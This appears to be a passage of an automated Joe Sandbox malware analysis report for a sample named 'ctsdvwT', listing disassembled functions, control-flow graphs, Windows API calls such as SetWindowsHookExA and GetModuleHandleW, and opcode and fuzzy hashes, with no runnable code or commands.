                                        control_flow_graph 1022 68bfe03-68bfe52 1025 68bfe5e-68bfe90 SetWindowsHookExA 1022->1025 1026 68bfe54-68bfe5c 1022->1026 1027 68bfe99-68bfeb9 1025->1027 1028 68bfe92-68bfe98 1025->1028 1026->1025 1028->1027
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 068BFE83
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: d3f0f1a250af531aaeeed58c779a58bfdeb4b03c32b52e9dda3c414697e6eb45
                                        • Instruction ID: d380abf86e678589fc6c81969fc5e6c88db00549a17e20feea843f58e6c8c7e4
                                        • Opcode Fuzzy Hash: d3f0f1a250af531aaeeed58c779a58bfdeb4b03c32b52e9dda3c414697e6eb45
                                        • Instruction Fuzzy Hash: 0B2124B5D002499FDB14DF9AD844BEEFBF5FB88310F10842AE518A7250CB75A945CFA0
                                        Function 068BFE08 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1032 68bfe08-68bfe52 1034 68bfe5e-68bfe90 SetWindowsHookExA 1032->1034 1035 68bfe54-68bfe5c 1032->1035 1036 68bfe99-68bfeb9 1034->1036 1037 68bfe92-68bfe98 1034->1037 1035->1034 1037->1036
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 068BFE83
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 5ab423c4f2a8b487acb71062de2ca0eef163f6fac1e1a008df4d584574a29c3e
                                        • Instruction ID: 31d6215295637ea614a942d7eefea5769b65cd0788f5ff94b2f4463a1244c389
                                        • Opcode Fuzzy Hash: 5ab423c4f2a8b487acb71062de2ca0eef163f6fac1e1a008df4d584574a29c3e
                                        • Instruction Fuzzy Hash: BC2124B5D002499FDB14CF9AC844BEEFBF5FB88310F10842AE518A7250C775A945CFA0
                                        Function 068B5E4C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1041 68b5e4c-68b7910 1043 68b7918-68b7943 GetModuleHandleW 1041->1043 1044 68b7912-68b7915 1041->1044 1045 68b794c-68b7960 1043->1045 1046 68b7945-68b794b 1043->1046 1044->1043 1046->1045
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 068B7936
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: eee8c36c10857d0988b6999fcaf2348869d6b5494c6311b2fa05af3d1e49e457
                                        • Instruction ID: 4b3002491a09f75878b84c6ee8fa0e8c33c956ec98b5152abae69d5f950110d6
                                        • Opcode Fuzzy Hash: eee8c36c10857d0988b6999fcaf2348869d6b5494c6311b2fa05af3d1e49e457
                                        • Instruction Fuzzy Hash: 2E11EFB5C007498FDB20CF9AC444BDEFBF4AB89224F10842AD929B7750D379A545CFA5
                                        Function 068B78CA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1048 68b78ca-68b7910 1049 68b7918-68b7943 GetModuleHandleW 1048->1049 1050 68b7912-68b7915 1048->1050 1051 68b794c-68b7960 1049->1051 1052 68b7945-68b794b 1049->1052 1050->1049 1052->1051
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 068B7936
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: a1652650ad3fb49694d91f54bc41f1fdf3e4d23d9598a1fbe7154e6faf9a2082
                                        • Instruction ID: 60db857aaa4ac865ebcde7f889862348be4cdba6a4699134a256a1425d49f5e9
                                        • Opcode Fuzzy Hash: a1652650ad3fb49694d91f54bc41f1fdf3e4d23d9598a1fbe7154e6faf9a2082
                                        • Instruction Fuzzy Hash: 3A11EFB5C006898FDB20CF9AD444ADEFBF4AB89220F14856AD469A7710C379A546CFA1
                                        Function 068BC2E4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1054 68bc2e4-68bd90c KiUserCallbackDispatcher 1057 68bd90e-68bd914 1054->1057 1058 68bd915-68bd929 1054->1058 1057->1058
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,068BD875), ref: 068BD8FF
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 2e507ac4d84e85c64a58efd0c71cfc3ea9b83837fb6a6637e6d8ca140ed96969
                                        • Instruction ID: 152e81b876f1250c01e83834b2cdb520c6e1509b545dd6139d5136aaaa7474d7
                                        • Opcode Fuzzy Hash: 2e507ac4d84e85c64a58efd0c71cfc3ea9b83837fb6a6637e6d8ca140ed96969
                                        • Instruction Fuzzy Hash: B71133B58003499FCB20DF9AD484BDEBBF4EB48314F20842AE918A3350C375A944CFA4
                                        Function 068BDB8C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1060 68bdb8c-68be1d2 OleInitialize 1062 68be1db-68be1f8 1060->1062 1063 68be1d4-68be1da 1060->1063 1063->1062
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 068BE1C5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 880559228ed64e685724f476df90a0571bff23110e65f94c94452edd08865834
                                        • Instruction ID: fae576ddd5337a947cd259fb8781904f82aa9d5dd075ab17840d8d4dc9b0868f
                                        • Opcode Fuzzy Hash: 880559228ed64e685724f476df90a0571bff23110e65f94c94452edd08865834
                                        • Instruction Fuzzy Hash: FF1145B4800349CFCB20CFAAC448BDEBBF4EB48310F24881AE519A7300C374A944CFA4
                                        Function 068BE169 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1066 68be169 1067 68be170-68be1d2 OleInitialize 1066->1067 1068 68be1db-68be1f8 1067->1068 1069 68be1d4-68be1da 1067->1069 1069->1068
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 068BE1C5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 48b7a5b6a319c532088089eb0fc6074f37b8e50e119f857ab5e5e4f407b96a72
                                        • Instruction ID: b8d8c1b8c94361fec29f0bed1c07e8f0c2715ab022d2cbe13b4b615ccafc9880
                                        • Opcode Fuzzy Hash: 48b7a5b6a319c532088089eb0fc6074f37b8e50e119f857ab5e5e4f407b96a72
                                        • Instruction Fuzzy Hash: 691103B58007498FCB20CF9AD448BDEFBF8AB48214F248859E559A7740C374A545CFA5
                                        Function 068BD898 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,068BD875), ref: 068BD8FF
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: c3fab5ee4db58b9a254992590a5d3404ce138aedd2dba2667febcd30f8adb7b7
                                        • Instruction ID: afbaa164c8cfe5138e81a89359ff6c81296618c47d61d2440109e2360a26dabf
                                        • Opcode Fuzzy Hash: c3fab5ee4db58b9a254992590a5d3404ce138aedd2dba2667febcd30f8adb7b7
                                        • Instruction Fuzzy Hash: E51100B580028A8FDB20CF9AD484BDEBBF4EF48324F20845AE559A7250C374A544CFA4
                                        Function 030891E0 Relevance: .4, Instructions: 355COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22a0cbd1bc586b7dd781759bd0ca13d2aa242b9ab375b836c9a16dc15ab4bc1a
                                        • Instruction ID: 0481647a5a5e7cdeceb5ffa2a7b8a74cb294ba7cecfb2eade54cdd4523c4083a
                                        • Opcode Fuzzy Hash: 22a0cbd1bc586b7dd781759bd0ca13d2aa242b9ab375b836c9a16dc15ab4bc1a
                                        • Instruction Fuzzy Hash: 04D1AD71B012058FDB54EFA8D8807AEB7B6FF89310F1485AAE409EB395DB35D841CB90
                                        Function 0308776A Relevance: .3, Instructions: 327COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0630e1cece2b71809917df3afb14d640976546d890941fb1af553346d9060dc
                                        • Instruction ID: 5e34ce31a3f716a2ed5dfa6f0105faf479876b5cebc7f44572ea8d067f4935c0
                                        • Opcode Fuzzy Hash: a0630e1cece2b71809917df3afb14d640976546d890941fb1af553346d9060dc
                                        • Instruction Fuzzy Hash: C3C16E30700202ABDB65B728F99825973EAFBC5714B248979D049CB359CF76DC4ACB91
                                        Function 03088E64 Relevance: .3, Instructions: 296COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4467fe348e10ade034ee048ca42e3d62ac926e469bfe7b923819a09841f83062
                                        • Instruction ID: 3eecb5f51b9a527d0529c1388f6266195ede8c710e0844948a9b3e2d3a7ab7df
                                        • Opcode Fuzzy Hash: 4467fe348e10ade034ee048ca42e3d62ac926e469bfe7b923819a09841f83062
                                        • Instruction Fuzzy Hash: A6B18D34B052059FCB14EFA8D888AADBBF2FF88310F548569E806D7355DB359C42CB90
                                        Function 03084A9C Relevance: .3, Instructions: 259COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b79f411cac6a6e028f03f8feb1cbaf2988743de6af635a374c5b816964a82110
                                        • Instruction ID: e0b341c210d88cee5f3d9defbe077f1ab51e231186d6de8482bbbd8c4a5ec8fe
                                        • Opcode Fuzzy Hash: b79f411cac6a6e028f03f8feb1cbaf2988743de6af635a374c5b816964a82110
                                        • Instruction Fuzzy Hash: CEB15C70E0131ADFDB50EFAAC88179DFBF2AF88314F198529D454EB294EB749845CB81
                                        Function 03083E84 Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 485418e8a43f0cb3afdb88caf2332b1d79f632c22e3926eb1ee4632ae32cece0
                                        • Instruction ID: 9c4446c8db6301a240c1d0da445c887b161732346096fece74bbc53069f03bca
                                        • Opcode Fuzzy Hash: 485418e8a43f0cb3afdb88caf2332b1d79f632c22e3926eb1ee4632ae32cece0
                                        • Instruction Fuzzy Hash: 72A17F74E0120ADFDF50EFAAC8817DEBBF2AF88714F188129E454EB254DB749845CB85
                                        Function 03084814 Relevance: .2, Instructions: 181COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 601b849b09a48e76bc893edc0cee807d797b43b746243a9ea0f3f604b726a2ac
                                        • Instruction ID: e47219aacac723b2687c79a1d92de9b7d56949430cdf5ee7a27903dc2c04c8e2
                                        • Opcode Fuzzy Hash: 601b849b09a48e76bc893edc0cee807d797b43b746243a9ea0f3f604b726a2ac
                                        • Instruction Fuzzy Hash: 46719E70E0134ADFDB10EFAAC8817DDFBF1AF88314F188529E454AB250EB749846CB95
                                        Function 03084820 Relevance: .2, Instructions: 180COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43e4aa70861a5b3ddfc32ddbd77d98e6e0c666e5185955931d9ac30818d370fd
                                        • Instruction ID: cb3be8a6f1759a7e486950befedb7526787ff3091b348d5c571417c503eefd4b
                                        • Opcode Fuzzy Hash: 43e4aa70861a5b3ddfc32ddbd77d98e6e0c666e5185955931d9ac30818d370fd
                                        • Instruction Fuzzy Hash: 60719170E0130ADFDB10DFAAC8817DDFBF2AF88314F188529E454AB250EB749846CB84
                                        Function 03086CEF Relevance: .1, Instructions: 134COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a4012f16a5c0dc6fbea3e1295a1b650277f9f15741becacea79e9e1e7b7e265
                                        • Instruction ID: d6b85d45ac1d7fdae9916f2952aa7b444dd3d0b8ae7eb7764a0a1968e4b8234b
                                        • Opcode Fuzzy Hash: 9a4012f16a5c0dc6fbea3e1295a1b650277f9f15741becacea79e9e1e7b7e265
                                        • Instruction Fuzzy Hash: A8512F70D112188FDB18DFA9C885B9EBBF1BF48310F19852AE855BB391CB75A844CB94
                                        Function 03086CF8 Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c81de325879e0418600564566b497e2eee0c14cfd24996bbdeee4bcb70d98555
                                        • Instruction ID: 40c56704d7f560fbb886a3d8d2fb15b0205b86369ae06d2b858615702f37ea78
                                        • Opcode Fuzzy Hash: c81de325879e0418600564566b497e2eee0c14cfd24996bbdeee4bcb70d98555
                                        • Instruction Fuzzy Hash: 60513270D112188FDB18DFA9C884B9EFBF1BF48310F198429E855BB390CB75A844CB94
                                        Function 030819C0 Relevance: .1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b716a19d9561af2d1bb04adaa6065a590c75d0f32ca2afeb76dc62dea32039d
                                        • Instruction ID: b3592ad62973eeac63dc565a57c10d8a02af026bbd33e97c68e21b76b9a02ba0
                                        • Opcode Fuzzy Hash: 0b716a19d9561af2d1bb04adaa6065a590c75d0f32ca2afeb76dc62dea32039d
                                        • Instruction Fuzzy Hash: 1841813160A3A59FDB1BEB3898602D97FB0AF86144F0904E7C0C5DF2A3D7254C4AC7A6
                                        Function 0308EDE5 Relevance: .1, Instructions: 121COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa617637c74cef9bc86bd8c722b0201cd2d32855e6cac0675db9e888a6560cd9
                                        • Instruction ID: b166cfad9b4d82721a5dcea3e68e0a5ceeb66a17a023123d8ad8cc45be66fd42
                                        • Opcode Fuzzy Hash: fa617637c74cef9bc86bd8c722b0201cd2d32855e6cac0675db9e888a6560cd9
                                        • Instruction Fuzzy Hash: 4A410E30700206CFEB95EB38D65426E3BE6BF85640B684468D046EB395EF35CC06C7A1
                                        Function 0308112B Relevance: .1, Instructions: 115COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0019c50574b118e7baee2e86eceac58fa725ebb28856b7c3cc1eca061f8c2b0
                                        • Instruction ID: 4bec895f945fa1b60fddb9941ff8e0a4b84547b0e189694e94646d8cee6d93a9
                                        • Opcode Fuzzy Hash: a0019c50574b118e7baee2e86eceac58fa725ebb28856b7c3cc1eca061f8c2b0
                                        • Instruction Fuzzy Hash: 8F513F30302242EFCB25EB3CFE899567B61F799700300A5A9D0045B266DB3F6D09CFA6
                                        Function 03081138 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5775fcf569a636bb7558159faedd92598a9b3a452a5b923680b2f933ab1d722c
                                        • Instruction ID: a4a52d0b1d7bab0078b0ad03038c397d1c100a82cb65a4c774ad51a6321b0e71
                                        • Opcode Fuzzy Hash: 5775fcf569a636bb7558159faedd92598a9b3a452a5b923680b2f933ab1d722c
                                        • Instruction Fuzzy Hash: 04510D30302242EFCB25EB2CFE899567B61F799704301A5A9D0045B266DB3F6D09CFA6
                                        Function 030871F1 Relevance: .1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bd4a79bf45d0f4c4469a44d1cf3ad5dddd7212b606be5a9c847a0c5b9bd240b
                                        • Instruction ID: 6008e305b9c9cc3e82be1d7c012c003a49b347c14ed7d5f70b27078470b88957
                                        • Opcode Fuzzy Hash: 0bd4a79bf45d0f4c4469a44d1cf3ad5dddd7212b606be5a9c847a0c5b9bd240b
                                        • Instruction Fuzzy Hash: 5531A170E11219DBDB15EFA4C44079EB7B6FF45700F248465F841FB294D771A8458B51
                                        Function 0308ECAB Relevance: .1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9b8a0e8c421d6de380d88b7e612d1db359c307c76ba58004c14f5d7425885da
                                        • Instruction ID: c6792cb531b7e6c92c597c79da105180b3cab002fd90c0e04027a3ca05801ba2
                                        • Opcode Fuzzy Hash: f9b8a0e8c421d6de380d88b7e612d1db359c307c76ba58004c14f5d7425885da
                                        • Instruction Fuzzy Hash: 06316B30E15206DBCB18DF64D89469EB7F2FF89304F148529E846EB750DB71AC46CB91
                                        Function 03087200 Relevance: .1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a374da943a59d11494a72c3559def50af02443fe794dd5d19ad00375206cd5c
                                        • Instruction ID: e14542e2f5eb33376a0377d232e2e619a3904638b7805cab5fc1a1a76a97f24f
                                        • Opcode Fuzzy Hash: 7a374da943a59d11494a72c3559def50af02443fe794dd5d19ad00375206cd5c
                                        • Instruction Fuzzy Hash: D0319E30E1120ADBDB24EFA4D4407AEB7B6FF85710F248565F841FB254EB71A885CB51
                                        Function 030850A8 Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60d77c6329b090e5417b3e9de877eb3061b8d3077ace4aa1c638793a0650e6eb
                                        • Instruction ID: 852d7f9e95d7ac48dda7bf656966e6df958c3e78dbb337166c0906252a081f15
                                        • Opcode Fuzzy Hash: 60d77c6329b090e5417b3e9de877eb3061b8d3077ace4aa1c638793a0650e6eb
                                        • Instruction Fuzzy Hash: 74314134701214DFDF69EB78D9546AEB7F6AF89201F1405B8D441AB391DB3B9C02CB92
                                        Function 030826EF Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f9aed6dae747c0ae34aa15b50c54e02a44f79ddf46bea6019851a9dec505811
                                        • Instruction ID: d568194dcc71ff2610561bfa78f53244ab011e559854b6740801a560412011cb
                                        • Opcode Fuzzy Hash: 5f9aed6dae747c0ae34aa15b50c54e02a44f79ddf46bea6019851a9dec505811
                                        • Instruction Fuzzy Hash: B6410FB5D01349DFDB14DFA9C480ADEBBF5FF48310F24842AE819AB250DB759946CB90
                                        Function 0308ECB8 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d9290cd783c554871e8f888fdd233f82e3d06bb6466def4e871b064be59bd05
                                        • Instruction ID: aac779640711917d2192d923c013e35daf3ef11f17f964e2cde0f2c4898da87a
                                        • Opcode Fuzzy Hash: 4d9290cd783c554871e8f888fdd233f82e3d06bb6466def4e871b064be59bd05
                                        • Instruction Fuzzy Hash: C2318C30E11206DBCB18DF64D89469EB7F6FF89300F148929E846EB350EB71AC46CB91
                                        Function 030826F8 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b205eaafe9bbdc5b6a48354324c3612aadac6153e599895a9254b39230d4383
                                        • Instruction ID: a6fea579809e8fe07e33c68e3318640d01e82870a0516ccf7b3007246536e4a5
                                        • Opcode Fuzzy Hash: 6b205eaafe9bbdc5b6a48354324c3612aadac6153e599895a9254b39230d4383
                                        • Instruction Fuzzy Hash: 6B41FEB4D01349DFDB14DFA9C484ADEBBF5FF48310F24842AE819AB250DB75A946CB90
                                        Function 030850B8 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3971e1c874ee3d955a07925fa1718403073306d5df4417f1a1225029ed65d570
                                        • Instruction ID: 4b344c21bb7bb5bf65b1d91db28308efad3dab653fa64999ac059d5d8bca2171
                                        • Opcode Fuzzy Hash: 3971e1c874ee3d955a07925fa1718403073306d5df4417f1a1225029ed65d570
                                        • Instruction Fuzzy Hash: DB314C34701215DFDF68EB78D9546AEB7F6AF89241F1404B8D441AB390DB3B9C02CBA6
                                        Function 03088D50 Relevance: .1, Instructions: 86COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c03c510ea9d428d7143b95b89d7f5c7054de508482d2477bde9d30b79fe7180c
                                        • Instruction ID: 24fe3a5710f857e31ded0a22b9a07bce5b9a3c11b81c0a322863dbd2a60c9c0d
                                        • Opcode Fuzzy Hash: c03c510ea9d428d7143b95b89d7f5c7054de508482d2477bde9d30b79fe7180c
                                        • Instruction Fuzzy Hash: 6531DF31E0120A9BCB15EF68D89069EF7F6FF89304F54C51AE845EB341DB719846CB81
